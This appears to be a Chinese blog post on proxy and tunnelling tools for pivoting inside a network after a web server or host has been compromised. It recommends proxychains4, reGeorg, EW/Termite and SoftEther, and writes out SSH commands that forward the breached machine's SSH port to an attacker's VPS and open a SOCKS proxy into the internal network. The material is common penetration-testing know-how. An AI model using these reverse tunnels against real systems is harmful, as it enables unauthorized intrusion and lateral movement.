本地工具

proxychains4或者Proxifier。这边比较推荐的就是他俩。如果大佬们有更好用的可以推荐给我。

我日常渗透用的是MAC,并且我把一部分常用工具都搬到了我的OSX下,在我实际做渗透的时候发现更多情况下proxychains4要比Proxifier好用。

有些时候在用一些Python脚本(比如F-NAScan)通过代理扫描的时候Proxifier会全部误报,并且Proxifier在我的MAC上没办法正确代理MSF的流量,所以我一般选择的都是proxychains4。不知道有没有别的大佬也遇到过这种情况,如果有大佬知道怎么解决这个问题请py一下。

另外MAC上使用proxychains4是有坑的,要先去禁用SIP。

这里推荐proxychains4并不是说Proxifier不好用,只是有些情况不适用,但是Proxifier有他的强大之处,它可以自己指定规则,用起来很方便,尤其适用OSX下的一些客户端工具的流量代理,所以建议大家在实际使用的时候最好两者搭配起来使用。

HTTP代理

一般情况下就是reGeorg,GitHub上可以找到这个项目的,看一下readme就可以用了,HTTP代理的优势就是利用的就是本身的web端口,有效突破各种防火墙,但是缺点就是不够稳定。

在实际渗透中经常能遇到内网中的WEB服务器,通过nginx反代,或者经过堡垒机才能访问外网,这时候可能搞下来的WEB机器并不可以直接访问外网,这时候不得已的话只能采用HTTP代理。

Socks代理

Termite作为EW的进化版支持更多功能,两个版本的看情况使用,如果只是简单的Socks代理只要EW就够了,需要搭建特别复杂的网络环境的时候就要上Termite了。下面偷来小伙伴Rootclay记录的一堆使用命令总结

更加清楚的使用说明

Termite和EW可都是全平台通用的哦,并且并不需要特别高的权限就可以使用。

稳定SOCKS代理SSH

这个还是来自于小伙伴Rootclay的,他在文章中总结的已经很棒了,这边我再来大概总结一下。

大家都知道SSH可以进行端口转发,还可以通过SSH实现Socks代理,并且用SSH开启的Socks代理是非常稳定的。

那么问题来了,当搞下来的机器在内网的时候,成功在机器上新建了一个root用户或者拿到root用户密码了,并且这台机器还可以与外网通讯的时候,就可以采用小伙伴文章里面的办法了。
请输入图片描述

Rootclay的思路就是将目标机的ssh端口通过端口转发到外网vps,这样就可以直接连接目标机的ssh了,然后再按照正常的方法连接ssh启动Socks代理就可以了。

具体的启动命令:

1.用内网的机器连接你的vps并且转发ssh的端口 ssh -p 22 -qngfNTR 6666:localhost:22 VPS-user@VPS

这里将目标机的22端口转发到了vps上的6666端口,但是这里如果你到vps会发现6666端口是被监听在127.0.0.1

然后就可以正常的连接ssh并且开启Socks代理了ssh -p 6666 -qngfNTD 6767 内网用户@VPS
Socks端口开在本地的6767,就可以通过proxychains4或者Proxifier舒服的在内网里面漫游了。

VPN

关于VPN,这边推荐一个以前用过感觉还可以的工具softether

最后修改:2023 年 08 月 04 日
如果觉得我的文章对你有用,请随意赞赏